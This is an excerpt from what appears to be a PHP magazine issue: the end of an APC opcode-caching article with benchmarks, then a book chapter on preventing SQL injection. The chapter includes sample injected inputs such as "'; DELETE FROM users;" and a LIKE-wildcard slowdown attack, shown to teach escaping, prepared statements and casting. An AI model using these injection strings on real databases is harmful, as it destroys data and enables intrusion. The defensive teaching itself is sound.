Imagine a server whose front page gets hit hundreds of times per second. When you modify that front page file, many requests will see that the cached opcodes are now stale and will attempt to compile and cache the script from disk. APC doesn’t really mind this, as it is smart enough to avoid any sort of race conditions during the compile and cache procedure, so you will never end up with an inconsistent cache. However, each request that tries to cache a script starts allocating memory in the cache at the same time. Once all the small chunks of memory have been allocated and populated correctly, the cache entry gets activated atomically, and any previous entries for the same file get put on a deleted list and are deleted when everyone is done accessing them. This means that modifying files on a busy server can lead to many simultaneous memory allocations, and you could potentially fill up your shared memory segment because of multiple concurrent requests all attempting to cache the same file at approximately the same time.

APC attempts to reduce the negative effects of this situation with a slam_defense option. It can be set to a percentage between 0 and 100 that indicates the likelihood that a request that hits an uncached file will skip trying to cache it. Very much like the file_update_protection setting, this is a mechanism to ease the pain of something that really should be handled differently by the user (the person who deploys the changed file, in this case). You can completely eliminate both the partial update and the cache slam problems by writing to a temporary file first; then, load that temporary file once through your webserver (and thus, APC) to force it to be cached, and then rename the file to its final destination. You might expect that the file would be re-cached once its name is changed, but recall that APC uses the device and inode of the file, not its name, to uniquely identify it. When you rename a file, the inode doesn’t change, nor does the modification time.

Userspace Access to the Cache

There are a couple of ways to make use of the cache from your userspace PHP scripts.

The first way is to poke it for information about what it is doing. The apc.php script that comes with APC is an example of how to use the apc_cache_info() and apc_sma_info() functions. These return an array that contains information about objects stored in the cache and the amount of memory that each of these objects is using. apc_clear_cache() lets you remove all entries from the cache without needing to restart your server. Normally you wouldn’t need to call this function.

The apc_store() and apc_fetch() functions are much more interesting. These allow you to store your own data in the cache. Generally, you will want to use these functions for relatively small amounts of data that is used repeatedly and is expensive to generate. For example, you might have an XML-based configuration file for your application. People have tended to shy away from this in the past, but with the simplexml extension in PHP 5, it is extremely easy to write a parser, and with APC storing the parsed config array, it is also blazingly fast. Take this sample config file:

This should be mostly self-explanatory: load the XML file using simplexml, loop through each section, use the $entry['name'] shortcut for picking the name attribute out of the entry, and make this name the key for each section sub-array. Then, since below each section in our example we just have flat XML with no attributes or sub-nodes, we can just cast it directly to an array and stick the data directly into our $config array. If you have a completely flat XML config file, you could just cast $xml directly to an array and you are done, but usually configuration files are slightly more complex, and you need to decide how to deal with attributes and what you want your final array to look like. The above three lines give us an array like this:

FIGURE 1: The apc.php script

Now we can add apc_store()/apc_fetch() caching

and our entire xml-based parsing and caching solution

You may want to add a bit of error checking to make sure that the conf.xml file actually exists, and if you are going to do that, it means a stat() call. You might as well make use of that extra system call and pull in the modification time, using filemtime(). So, our final approach would look like this:

Now we can change our conf.xml file all we want, and it will be reparsed on the request that immediately follows the change, and cached in shared memory between changes. apc_store() takes a third optional argument, which is the number of seconds to cache the passed data. This makes it easy to use the store/fetch method for caching remote data where you want to fetch a new version every 30 minutes, for example.
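As a rough illustration of the approach described in this section (not the article's own listing), the sketch below parses a sectioned XML config into an array and re-parses only when the file's modification time changes. The function names, the cache key, and the XML layout (section elements with a name attribute and flat children) are assumptions. The apc_fetch()/apc_store() calls are guarded, so the code still runs, uncached, where APC is not installed.

```php
<?php
// Parse <config><section name="..."><key>value</key>...</section></config>
// into array('section' => array('key' => 'value', ...), ...).
function parse_config($file) {
    $xml = simplexml_load_file($file);
    if ($xml === false) {
        return false;
    }
    $config = array();
    foreach ($xml->section as $section) {
        $values = array();
        foreach ($section->children() as $child) {
            $values[$child->getName()] = (string) $child;
        }
        $config[(string) $section['name']] = $values;
    }
    return $config;
}

// Return the parsed config, using the cache while the mtime is unchanged.
function load_config($file) {
    $mtime = @filemtime($file);     // one stat(): existence check plus mtime
    if ($mtime === false) {
        return false;
    }
    $use_apc = function_exists('apc_fetch') && function_exists('apc_store');
    $key = 'config:' . $file;       // hypothetical cache key
    if ($use_apc) {
        $hit = apc_fetch($key);
        if (is_array($hit) && $hit['mtime'] === $mtime) {
            return $hit['data'];
        }
    }
    $data = parse_config($file);
    if ($use_apc && $data !== false) {
        apc_store($key, array('mtime' => $mtime, 'data' => $data));
    }
    return $data;
}
```

Storing the modification time alongside the data is one simple way to invalidate the entry; passing a time-to-live as the third argument to apc_store() is the alternative mentioned above for remote data.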

Real world Performance Numbers

Let’s look at 4 examples of what you can expect when you add APC to your system.

First, a common photo album application: Gallery (version 1). With no opcode cache, hitting a page of an album in Gallery with 9 photos on it yields just over 9 requests per second. That’s not very fast. Although, looking at it a different way, it is about 800,000 requests/day. Of course, that is just for the HTML for that album page and doesn’t include all of the extra requests needed to fetch each thumbnail and whatever other images are on there. Still, it is probably more than fast enough for your family album. But faster is always better. Adding APC gets us up to 30 requests/second, without changing a single line of code. At these speeds, you do notice a difference. An application that normally attains 30 requests/second, versus one that puts out 10 requests/second, feels snappier. Or turn it around: 33ms to finish a request vs 110ms.

With a slight tweak, we can bring this up to about 32 requests/second. Not much of an improvement. The low-hanging fruit is usually the configuration information for an application like this. Unfortunately, Gallery stores its config in nested classes that will need to be serialized and unserialized. Improving on this makes Gallery a bit faster, but it is probably not worth the maintenance headache of having locally modified files. It is just a couple of lines in Gallery’s config.php file, though. At the top:

if ($tmp = apc_fetch('gallery')) { $gallery = unserialize($tmp);

if (!$config = apc_fetch('config')) include 'config.inc';

And, of course, at the bottom of config.inc you would need to add:

apc_store('config', $config);

This serialization of objects will be done by APC internally soon, so it will go a bit faster by eliminating the extra userspace unserialize call, but it will still be nowhere near as fast as using an array that gets copied directly out of shared memory.

FUDforum-2.6 is a popular bulletin board application. Without APC, viewing a message thread with a couple of messages in it gets me 46 requests/second. Turning on APC brings that up to 160 requests/second. Looking at FUDforum’s config system, it (unfortunately) uses a bunch of global variables in a file called GLOBALS.php. This file also includes a bunch of other things, and it is included from all over, so it isn’t easy to eliminate the include call, nor is it easy to cache the actual config variables. But it can be done at the top of GLOBALS.php.

The main performance problem here is the need to do the extract(). In the end, this slows us down to about 153 requests/second. If there were heavier logic and perhaps an SQL query or some XML parsing involved in creating the list of variables, then this approach would have helped.

Serendipity, also known as s9y, is an application for people who want to host their own weblogs. I get 10 requests/second on a plain PHP installation, and 37 requests/second after adding APC. Although the configuration system is array-based, there is plenty of logic intertwined, so it is also difficult to cache this information in s9y.

Finally, let’s look at a code snippet written with APC in mind. I recently needed a flexible and fast RSS/Atom feed reader. It uses simplexml and a couple of PHP 5.1 tricks to reduce the RSS or Atom XML data down into an easily cacheable array. The code is a bit long to include here, but fire up a browser and have a look at it: http://lerdorf.com/simple_rss.phps. The inline comments should help make sense of the code. It is basically just a complicated example of the XML-based config file parser we developed earlier, but now we get some numbers.

You will notice there are two levels of caching. It caches the parsed XML to shared memory with apc_store() and it also caches the downloaded raw XML to disk. I tend to do this because I have multiple things reading these various XML files and they sometimes have different ideas of what is interesting in them. This way I can have different parsers that parse the disk-cached XML into their own shared memory slots, but don’t need to hit the backend server for each separate application. On my lerdorf.com server I have http://buzz.progphp.com, http://flickr.progphp.com and http://lerdorf.com itself all wanting to access some of the same XML files in very different ways.

Now, for the numbers: I am using my RSS2 feed from http://toys.lerdorf.com as the sample XML file. Without any caching at all, not even disk-based raw XML caching, I get about 25 requests per second. But that number is very variable, depending on the amount of traffic on the remote server and general network latency issues. It is clear that fetching the entire remote 76kB XML file on every request is not a smart thing to do. Simply caching the XML data between requests brings that number way up to 165 requests per second. Finally, and most dramatically, adding apc_store() and apc_fetch() takes us to 550 requests/second. This brings us to the point where getting a 76kB XML feed into an easily walkable array is basically free, from a performance perspective. That’s less than 2ms per end-to-end request on a rather low-end 1.8GHz Athlon box with IDE drives, running Ubuntu Linux and an untuned default Apache install. Turning off Keepalive, and changing MaxRequestsPerChild from its default 100 to 0 (unlimited), brings that number up to 590 requests per second.

Conclusion: Speed is Good!

Opcode caching plus injecting user caching in the right places in your application can result in dramatic performance gains.

In my RSS example, I went from 25 requests/second to nearly 600. In a full application, there are performance gains to be had all along the way. You need to look at where your data comes from, how often it changes, and how close to the final presentation format you can get it before it is cached. Applications that were not designed with this in mind from the start can be difficult to retrofit. Keep your designs simple and clean. Do not use objects as datastores, and try to avoid spaghetti include sequences; your applications will be easier to deploy and will run much faster.

SQL Injection

FEATURE

http://forum.phparch.com/259

The goal of SQL injection is to insert arbitrary data, most often a database query, into a string that’s eventually executed by the database. The insidious query may attempt any number of actions, from retrieving alternate data to modifying or removing information from the database.

To demonstrate the problem, consider this excerpt:

// supposed input
$name = "ilia'; DELETE FROM users;";
mysql_query("SELECT * FROM users WHERE name='{$name}'");

The function call is supposed to retrieve a record from the users table where the name column matches the name specified by the user. Under normal circumstances, $name would only contain alphanumeric characters and perhaps spaces, such as the string ilia. But here, by appending an entirely new query to $name, the call to the database turns into disaster: the injected DELETE query removes all records from users.

MySQL Exception

Fortunately, if you use MySQL, the mysql_query() function does not permit query stacking, or executing multiple queries in a single function call. If you try to stack queries, the call fails.

However, other PHP database extensions, such as SQLite and PostgreSQL, happily perform stacked queries, executing all of the queries provided in one string and creating a serious security problem.

SQL injection is a common vulnerability that is the result of lax input validation. In this excerpted chapter from php|architect’s Guide to PHP Security, you will learn how to thwart this type of attack.

by ILIA ALSHANETSKY author of

php|architect’s Guide to PHP Security


Magic Quotes

Given the potential harm that can be caused by SQL injection, PHP’s automatic input escape mechanism, magic_quotes_gpc, provides some rudimentary protection. If enabled, magic_quotes_gpc, or “magic quotes”, adds a backslash in front of single-quotes, double-quotes, and other characters that could be used to break out of a value identifier. But magic quotes is a generic solution that doesn’t include all of the characters that require escaping, and the feature isn’t always enabled. Ultimately, it’s up to you to implement safeguards to protect against SQL injection.

To help, many of the database extensions available for PHP include dedicated, customized escape mechanisms. For example, the MySQL extension for PHP provides the function mysql_real_escape_string() to escape input characters that are special to MySQL:

However, before calling a database’s own escaping mechanism, it’s important to check the state of magic quotes. If magic quotes is enabled, remove any backslashes (\) it may have added; otherwise, the input will be doubly-escaped, effectively corrupting it (because it differs from the input supplied by the user).
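The order of operations described above (undo magic quotes first, then apply the database's own escape function) might be wrapped up as in the following sketch. The helper name escape_input() is hypothetical, and the escape function is passed in as a callable so the example does not depend on any particular database extension. The function_exists() guard is there because get_magic_quotes_gpc() is not available in every PHP version.

```php
<?php
// Hypothetical helper: strips the slashes added by magic quotes (when the
// feature exists and is enabled), then applies the given escape function.
function escape_input($value, $escape) {
    if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
        $value = stripslashes($value);   // undo the automatic escaping first
    }
    return call_user_func($escape, $value);
}
```

In an application, the second argument would typically name the extension's native function, such as 'mysql_real_escape_string' or 'pg_escape_string', once a connection is open.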

In addition to securing input, a database-specific escape function prevents data corruption. For example, the escape function provided in the MySQL extension is aware of the connection’s character set and encodes characters accordingly to ensure that data isn’t corrupted by the MySQL storage mechanism and vice versa.

Native escape functions are also invaluable for storing binary data: left “unescaped”, some binary data may conflict with the database’s own storage format, leading to the corruption or loss of a table or the entire database. Some database systems, such as PostgreSQL, offer a dedicated function to encode binary data. Rather than escape problematic characters, the function applies an internal encoding. For instance, PostgreSQL’s pg_escape_bytea() function applies a Base64-like encoding to binary data:

// for plain-text data use:

pg_escape_string($regular_strings);

// for binary data use:

pg_escape_bytea($binary_data);

A binary data escaping mechanism should also be used to process multi-byte languages that aren’t supported natively by the database system. (Multi-byte languages such as Japanese use multiple bytes to represent a single character; some of those bytes overlap with the ASCII range normally only used by binary data.)

There’s a disadvantage to encoding binary data: it prevents persisted data from being searched other than by a direct match. This means that a partial match query such as LIKE 'foo%' won’t work, since the encoded value stored in the database won’t necessarily match the initial encoded portion looked for by the query.

For most applications, though, this limitation isn’t a major problem, as partial searches are generally reserved for human readable data and not binary data, such as images and compressed files.

Prepared Statements

While database-specific escape functions are useful, not all databases provide such a feature. In fact, database-specific escape functions are relatively rare. (At the moment, only the MySQL, PostgreSQL, SQLite, Sybase, and MaxDB extensions provide them.) For other databases, including Oracle, Microsoft SQL Server, and others, an alternate solution is required.

A common technique is to Base64-encode all values passed to the database, thus preventing any special characters from corrupting the underlying store or causing trouble. But Base64-encoding expands data roughly 33 percent, requiring larger columns and more storage space. Furthermore, Base64-encoded data has the same problem as binary encoded data in PostgreSQL: it cannot be searched with LIKE. Clearly a better solution is needed: something that prevents incoming data from affecting the syntax of the query.

Prepared queries (also called prepared statements) solve a great many of the aforementioned risks. Prepared queries are query “templates”: the structure of the query is pre-defined and fixed, and includes placeholders that stand in for real data. The placeholders are typically type-specific (for example, int for integer data and text for strings), which allows the database to interpret the data strictly. For instance, a text placeholder is always interpreted as a literal, avoiding exploits such as the query stacking SQL injection. A mismatch between a placeholder’s type and its incoming datum causes execution errors, adding further validation to the query.

In addition to enhancing query safety, prepared queries improve performance. Each prepared query is parsed and compiled once, but can be re-used over and over. If you need to perform an INSERT en masse, a pre-compiled query can save valuable execution time.

Preparing a query is fairly simple. Here is an example:

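pg_query($conn, "PREPARE stmt_name (text) AS "
    . "SELECT * FROM users WHERE name=$1");
// EXECUTE is itself sent as SQL text, so the value is passed
// as a quoted, escaped literal
pg_query($conn, "EXECUTE stmt_name ('" . pg_escape_string($name) . "')");
pg_query($conn, "DEALLOCATE stmt_name");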

PREPARE stmt_name (text) AS creates a prepared query named stmt_name that expects one text value. Everything following the keyword AS defines the actual query, except $1 is the placeholder for the expected text.

If a prepared statement expects more than one value, list each type in order, separated by a comma, and use $1, $2, and so on for each placeholder, as in PREPARE stmt_example (text, int) AS SELECT * FROM users WHERE name=$1 AND id=$2.

Once compiled with PREPARE, you can run the prepared query with EXECUTE. Specify two arguments: the name of the prepared statement (such as stmt_name) to run and a list of actual values enclosed in parentheses.

Once you’re finished with the prepared statement, dispose of it with DEALLOCATE. Forgetting to jettison prepared queries can cause future PREPARE queries to fail. This is a common error when persistent database connections are used, where a statement can persist across requests. For example, given that there is no way to check if a statement exists or not, a blind attempt to create one anyway will trigger a query error if one is already present.

As nice as prepared queries are, not all databases support them; in those instances escaping mechanisms should be used.
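For a self-contained way to see a placeholder neutralize the injection string from the start of this chapter, the sketch below uses PDO with an in-memory SQLite database. That choice is an assumption made purely so the example runs without a database server; it is not the pg_query() approach shown above, and find_user() is a hypothetical helper.

```php
<?php
// Sketch: a bound placeholder is treated as data, never as SQL text.
function find_user(PDO $db, $name) {
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = ?');
    $stmt->execute(array($name));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO users (name) VALUES ('ilia')");

$hostile = "ilia'; DELETE FROM users;";
$rows    = find_user($db, $hostile);    // compared as a literal string
$count   = (int) $db->query('SELECT COUNT(*) FROM users')->fetchColumn();
```

The hostile value simply fails to match any name, and the row count is unaffected because the DELETE is never parsed as SQL.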

No Means of Escape

Alas, escape functions do not always guarantee data safety. Certain queries can still permit SQL injection, even after escapes are applied.

Consider the following situation, where a query expects an integer value:

$id = "0; DELETE FROM users";
$id = mysql_real_escape_string($id); // 0; DELETE FROM users
mysql_query("SELECT * FROM users WHERE id={$id}");

When executing integer expressions, it’s not necessary to enclose the value inside single quotes. Consequently, the semicolon character is sufficient to terminate the query and inject an additional query. Since the semicolon doesn’t have any “special” meaning, it’s left as-is by both the database escape function and addslashes().

There are two possible solutions to the problem.

The first requires you to quote all arguments. Since single quotes are always escaped, this technique prevents SQL injection. However, quoting still passes the user input to the database, which is likely to reject the query. Here is an illustrative example:

$id = pg_escape_string($id); // 0; DELETE FROM users
pg_query($conn, "SELECT * FROM users WHERE id='{$id}'")
    or die(pg_last_error($conn));
// will print: invalid input syntax for integer: "0; DELETE FROM users"

But query failures are easily avoided, especially when validation of the query arguments is so simple. Rather than pass bogus values to the database, use a PHP cast to ensure each datum converts successfully to the desired numeric form.

For example, if an integer is required, cast the incoming datum to an int; if a floating-point number is required, cast to a float.

$id = (int) $id; // 123
pg_query($conn, "SELECT * FROM users WHERE id={$id}"); // safe

A cast forces PHP to perform a type conversion. If the input is not entirely numeric, only the leading numeric portion is used. If the input doesn’t start with a numeric value, or if the input is only alphabetic and punctuation characters, the result of the cast is 0. On the other hand, if the cast is successful, the input is a valid numeric value and no further escaping is needed.

Numeric casting is not only very effective, it’s also efficient, since a cast is a very fast, function-free operation that also obviates the need to call an escape routine.
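The casting behaviour described above is easy to check directly. In this small sketch, safe_id() is a hypothetical wrapper name that does nothing beyond the (int) cast; the query string is only built, not sent anywhere.

```php
<?php
// Hypothetical helper name; it only wraps the (int) cast.
function safe_id($raw) {
    return (int) $raw;
}

// The injection attempt collapses to its leading numeric portion.
$id  = safe_id("0; DELETE FROM users");
$sql = "SELECT * FROM users WHERE id={$id}";
```

Whatever the input, the value interpolated into the query is an integer, so nothing after the number can reach the database.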

The LIKE Quandary

The SQL LIKE operator is extremely valuable: its % and _ (underscore) qualifiers match 0 or more characters and any single character, respectively, allowing for flexible partial and substring matches. However, both LIKE qualifiers are ignored by the database’s own escape functions and PHP’s magic quotes. Consequently, user input incorporated into a LIKE query parameter can subvert the query, complicate the LIKE match, and in many cases, prevent the use of indices, which slows a query substantially. With a few iterations, a compromised LIKE query could launch a Denial of Service attack by overloading the database.

Here’s a simple yet effective attack:

$sub = mysql_real_escape_string("%something");
// still %something
mysql_query("SELECT * FROM messages "
    . "WHERE subject LIKE '{$sub}%'");

The intent of the SELECT above is to find those messages that begin with the user-specified string, $sub. Uncompromised, that SELECT query would be quite fast, because the index for subject facilitates the search. But if $sub is altered to include a leading % qualifier (for example), the query can’t use the index and the query takes far longer to execute; indeed, the query gets progressively slower as the amount of data in the table grows.

The underscore qualifier presents both a similar and a different problem. A leading underscore in a search pattern, as in _ish, cannot be accelerated by the index, slowing the query. And a trailing underscore may substantially alter the results of the query. To complicate matters further, underscore is a very common character and is frequently found in perfectly valid input.

To address the LIKE quandary, a custom escaping mechanism must convert user-supplied % and _ characters to literals. Use addcslashes(), a function that lets you specify a character range to escape.

$sub = addcslashes(mysql_real_escape_string("%something_"), "%_");
// $sub == \%something\_
mysql_query("SELECT * FROM messages "
    . "WHERE subject LIKE '{$sub}%'");

Here, the input is processed by the database’s prescribed escape function and is then filtered through addcslashes() to escape all occurrences of % and _. addcslashes() works like a custom addslashes(), is fairly efficient, and is a much faster alternative than str_replace() or the equivalent regular expression.

Remember to apply manual filters after the SQL filters to avoid escaping the backslashes; otherwise, the escapes are escaped, rendering the backslashes as literals and causing special characters to re-acquire special meanings.
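The LIKE-specific step can be isolated in a small helper so that it is always applied last. The name escape_like() is made up for this sketch, and it expects a value that has already been through the database's own escape function.

```php
<?php
// Hypothetical helper: escapes the LIKE wildcards % and _ in a value
// that was already processed by the database's escape function.
function escape_like($escaped) {
    return addcslashes($escaped, '%_');
}
```

Calling it as escape_like(mysql_real_escape_string($input)) keeps the order recommended above: SQL escaping first, wildcard escaping second.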

SQL Error Handling

One common way for hackers to spot code vulnerable to SQL injection is by using the developer’s own tools against them. For example, to simplify debugging of failed SQL queries, many developers echo the failed query and the database error to the screen and terminate the script.

… for any number of reasons.) Besides being embarrassing, the code may reveal a great deal of information about the application or the site. For instance, the end-user may be able to discern the structure of the table and some of its fields, and may be able to map GET/POST parameters to data to determine how to attempt a better SQL injection attack. In fact, the SQL error may have been caused by an inadvertent SQL injection. Hence, the generated error becomes a literal guideline to devising more tricky queries.

The best way to avoid revealing too much information is to devise a very simple SQL error handler to handle SQL failures:

function sql_failure_handler($query, $error) {
    // build the log entry; escape it so nothing renders as HTML
    $msg = htmlspecialchars("Failed Query: {$query} "
        . "SQL Error: {$error}");
    // message type 3 appends the entry to the named file
    error_log($msg, 3, "/home/site/logs/sql_error_log");
    if (defined('debug')) {
        return $msg;
    }
    return "Requested page is temporarily unavailable, "
        . "please try again later.";
}
mysql_query($query)

The handler function takes the query and error message generated by the database and creates an error string based on that information. The error string is passed through htmlspecialchars() to ensure that none of the characters in the string are rendered as HTML, and the string is appended to a log file.

The next step depends on whether or not the script is working in debug mode. If in debug mode, the error message is returned and is likely displayed on-screen for the developer to read. In production, though, the specific message is replaced with a generic message, which hides the root cause of the problem from the visitor.

Authentication Data Storage

Perhaps the final issue to consider when working with databases is how to store your application’s database credentials: the login and password that grant access to the database. Most applications use a small PHP configuration script to assign a login name and password to variables. This configuration file, more often than not (at least on shared hosts), is left world-readable to provide the web server user access to the file. But world-readable means just that: anyone on the same system or an exploited script can read the file and steal the authentication information stored within. Worse, many applications place this file inside web readable directories and give it a non-PHP extension (.inc is a popular choice). Since .inc is typically not configured to be interpreted as a PHP script, the web browser displays such a file as plain-text for all to see.

One solution to this problem uses the web server’s own facilities, such as .htaccess in Apache, to deny access to certain files. As an example, this directive denies access to all files that end (notice the $) with the string .inc:

<Files ~ "\.inc$">
    Order allow,deny
    Deny from all
</Files>

Alternatively, you can make PHP treat .inc files as scripts or simply change the extension of your configuration files to .php or, better yet, .inc.php, which denotes that the file is an include file.

However, renaming files may not always be the safest option, especially if the configuration files have some code aside from variable initialization in the main scope. The ideal and simplest solution is to simply not keep configuration and non-script files inside web server-accessible directories.

A proper solution must ensure that other users on the system have no way of seeing authentication data. Fortunately, the Apache web server provides just such a mechanism. The Apache configuration file, httpd.conf, can include arbitrary intermediate configuration files during start-up, while Apache is still running as root. Since root can read any file, you can place sensitive information in a file in your home directory and change it to mode 0600, so only you and the superuser can read and write the file.


Include /home/ilia/sql.cnf

</VirtualHost>

If you use the Include mechanism, be sure that your file is only loaded for a certain VirtualHost or a certain directory to prevent the data from being available to other hosts on the system.

The content of the configuration file is a series of SetEnv lines, defining all of the authentication parameters necessary to establish a database connection.

SetEnv DB_LOGIN "login"
SetEnv DB_PASSWD "password"
SetEnv DB_DB "my_database"
SetEnv DB_HOST "127.0.0.1"

After Apache starts, these environment variables are accessible to the PHP script via the $_SERVER super-global or the getenv() function if $_SERVER is unavailable.

echo $_SERVER['DB_LOGIN']; // login
echo getenv("DB_LOGIN"); // login
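The two lookup paths mentioned above can be folded into one small function. This is only a sketch: db_setting() and its default-value parameter are hypothetical, and the variable names are the ones from the SetEnv example.

```php
<?php
// Hypothetical helper: looks a setting up in $_SERVER first and falls
// back to getenv(); returns $default when neither has it.
function db_setting($name, $default = null) {
    if (isset($_SERVER[$name])) {
        return $_SERVER[$name];
    }
    $value = getenv($name);
    return ($value === false) ? $default : $value;
}
```

A connection routine could then call db_setting('DB_HOST'), db_setting('DB_LOGIN'), and so on, without any credentials appearing in the script itself.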

An even better variant of this trick is to hide the connection parameters altogether, hiding them even from the script that needs them. Use PHP’s ini directives to specify the default authentication information for the database extension. These directives can also be set inside the hidden Apache configuration file.

php_admin_value mysql.default_host "127.0.0.1"
php_admin_value mysql.default_user "login"
php_admin_value mysql.default_password "password"

Now, mysql_connect() works without any arguments, as the missing values are taken from PHP ini settings. The only information remaining exposed would be the name of the database.

Because the application is not aware of the database settings, it consequently cannot disclose them through a bug or a backdoor, unless code injection is possible. In fact, you can enforce that only an ini-based authentication procedure is used by enabling SQL safe mode in PHP via the sql.safe_mode directive. PHP then rejects any database connection attempts that use anything other than ini values for specifying authentication data.

This approach does have one weakness in older versions of PHP: up until PHP 4.3.5, there was a bug in the code that leaked ini settings from one virtual host to another. Under certain conditions, this bug could be triggered by a user, effectively providing other users on the system with a way to see the ini values of other

For example, if a user only requires read-access to the database, don’t permit the user to execute UPDATE or INSERT queries. Or more realistically, limit write access to those tables that are expected to change, perhaps the session table and the user accounts table.

By limiting what a user can do, you can detect, track, and defang many SQL injection attacks. Limiting access at the database level is supplemental: you should use it in addition to all of the database security mechanisms listed in this chapter.

Maintaining Performance

Speed isn’t usually considered a security measure, but subverting your application’s performance is tantamount to any other exploit. As was demonstrated by the LIKE attack, where % was injected to make a query very slow, enough costly iterations against the database could saturate the server and prevent further connections. Unoptimized queries present the same risk: if the attacker spots inefficiencies, your server can be exhausted and rendered useless just the same.

To prevent database overloading, there are a few simple rules to keep in mind.

Only retrieve the data you need and nothing more. Many developers take the “*” shortcut and fetch all columns, which may result in a lot of data, especially when joining multiple tables. More data means more information to retrieve, more memory for the database’s temporary buffer for sorting, more time to transmit the results to PHP, and more memory and time to make the results available to your PHP application. In some cases, with large amounts of data, database sorting must be done within a search file instead of memory, adding to the overall time to process a request. Again, only retrieve the data you need, and name the columns to minimize size further.
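One way to make the "name your columns" rule hard to forget is a tiny query builder that refuses the "*" shortcut. This is only a sketch; select_columns() and the users table are invented for the example.

```php
<?php
// Hypothetical helper: build a SELECT that names every column explicitly.
function select_columns(string $table, array $columns): string
{
    if ($columns === []) {
        throw new InvalidArgumentException('Name at least one column.');
    }
    foreach (array_merge([$table], $columns) as $identifier) {
        // "*" and anything else that is not a plain identifier is rejected here.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $identifier)) {
            throw new InvalidArgumentException("Not a plain identifier: $identifier");
        }
    }
    return 'SELECT ' . implode(', ', $columns) . ' FROM ' . $table;
}

// Fetches two columns instead of every column the table happens to have.
echo select_columns('users', ['id', 'login']), "\n";
```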

To further accelerate a query, try using unbuffered queries that retrieve query results a small portion at a time. However, unbuffered queries must be used carefully: only one result cursor is active at any time, limiting you to work with one query at a time. (And in the case of MySQL, you cannot even perform INSERT, UPDATE, and other queries until all results from the result cursor have been fetched.)
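As a rough illustration of an unbuffered query, the sketch below streams rows one at a time. It assumes the mysqli extension and its MYSQLI_USE_RESULT mode (the older mysql extension offered mysql_unbuffered_query() for the same purpose); stream_rows() is a made-up name.

```php
<?php
// Sketch: stream rows from an unbuffered mysqli query (assumes the mysqli extension).
function stream_rows(mysqli $db, string $sql): Generator
{
    // MYSQLI_USE_RESULT leaves the rows on the server until they are fetched.
    $result = $db->query($sql, MYSQLI_USE_RESULT);
    if ($result === false) {
        throw new RuntimeException('Query failed: ' . $db->error);
    }
    try {
        while ($row = $result->fetch_assoc()) {
            yield $row; // only one row is held in PHP memory at a time
        }
    } finally {
        // Free the cursor; until then the connection cannot run another query.
        $result->free();
    }
}
```

A caller would loop with foreach (stream_rows($db, $sql) as $row) and must finish (or abandon) that loop before issuing any other query on the same connection, which is exactly the restriction described above.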

To work with a database, PHP must establish a connection to it, which in some cases can be a rather expensive operation, especially when working with complex systems like Oracle, PostgreSQL, MSSQL, and so on. One trick that speeds up the connection process is to make a database connection persistent, which allows the database handle to remain valid even after the script is terminated. If a connection is persistent, each subsequent connection request from the same web server process reuses the connection rather than recreating it anew.

The code below creates a persistent MySQL database connection via the mysql_pconnect() function, which is syntactically identical to the regular mysql_connect() function.

mysql_pconnect("host", "login", "passwd");

Other databases typically offer a persistent connection variant, some as simple as adding the prefix “p” to the word “connect”.

Anytime PHP tries to establish a persistent connection, it first looks for an existing connection with the same authentication values; if such a connection is available, PHP returns that handle instead of making a new one.
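The lookup described above can be modelled in a few lines. This is an illustrative model only, not PHP's internal implementation: the PersistentPool class and its methods are invented, and the "connection" is whatever object the supplied callable returns.

```php
<?php
// Illustrative model of per-process reuse; PHP's real logic lives inside the engine.
final class PersistentPool
{
    /** @var array<string, object> handles kept by this process, keyed by credentials */
    private array $handles = [];

    /** @param callable $connect opens a new connection when none can be reused */
    public function get(string $host, string $login, string $password, callable $connect): object
    {
        // The same host, login, and password always map to the same key.
        $key = hash('sha256', implode("\0", [$host, $login, $password]));
        if (!isset($this->handles[$key])) {
            $this->handles[$key] = $connect();
        }
        return $this->handles[$key];
    }

    public function count(): int
    {
        return count($this->handles);
    }
}

$pool   = new PersistentPool();
$first  = $pool->get('host', 'login', 'passwd', fn() => new stdClass());
$second = $pool->get('host', 'login', 'passwd', fn() => new stdClass());
var_dump($first === $second); // the second request reuses the first handle
```

Because each pool lives inside one process, every web server process ends up holding its own handle for each distinct set of credentials.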

Words of Caution

Persistent connections are not without drawbacks. For example, in PHP, connection pooling is done on a per-process basis rather than per-web server, giving every web-server process its own connection pool. So, 50 Apache processes result in 50 open database connections. If the database is not configured to allow at least that many connections, further connection requests are rejected, breaking your web pages.

In many cases, the database runs on the same machine as the web server, which allows data transmission to be optimized. Rather than using the slow and bulky TCP/IP, your application can use Unix Domain Sockets (UDS), the second fastest medium for Inter Process Communication (IPC). By switching to UDS, you can significantly improve the data transfer rates between the two servers.

To switch to UDS, change the host parameter of the connection. For example, in MySQL, set the host to a colon followed by the path to the socket.
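A short sketch of what the host parameter looks like for a socket connection. The socket path /tmp/mysql.sock and the helper names are assumptions; the ":/path/to/socket" host form is the one documented for mysql_connect(), and unix_socket is the corresponding key in a PDO MySQL DSN.

```php
<?php
// Host string for mysql_connect()/mysql_pconnect(): a colon, then the socket path.
function socket_host_string(string $socketPath): string
{
    return ':' . $socketPath;
}

// Equivalent PDO MySQL DSN, which names the socket with the unix_socket key.
function socket_pdo_dsn(string $socketPath, string $database): string
{
    return 'mysql:unix_socket=' . $socketPath . ';dbname=' . $database;
}

// Assumed socket location; check your MySQL configuration for the real path.
echo socket_host_string('/tmp/mysql.sock'), "\n";
echo socket_pdo_dsn('/tmp/mysql.sock', 'app'), "\n";
```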

Query Caching

In some instances, a query is as fast as it can be, yet still takes significant time to execute. If you cannot throw hardware at the problem (which has its limits as well), try to use the query cache. A query cache retains a query’s results for some period of time, short-circuiting the need to recreate the results from scratch each time the same query runs.

Each time there’s a request for a page, the cache is checked; if the cache is empty, if the cache expired the previous results, or if the cache was invalidated (say, by an UPDATE or an INSERT), the query executes. Otherwise, the results saved in the cache are returned, saving time and effort.
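The three conditions above (empty, expired, invalidated) can be sketched as a small in-memory cache. This is an application-level illustration, not the database's own query cache; QueryCache and its methods are hypothetical, and the callable stands in for whatever actually runs the SQL.

```php
<?php
// Hypothetical in-memory query cache with a time-to-live and manual invalidation.
final class QueryCache
{
    /** @var array<string, array{rows: array, expires: int}> */
    private array $entries = [];
    private int $ttl;

    public function __construct(int $ttlSeconds)
    {
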